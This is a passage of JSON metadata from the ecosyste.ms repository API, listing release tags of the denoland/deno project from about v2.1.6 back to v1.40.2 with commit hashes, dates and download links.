ull,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts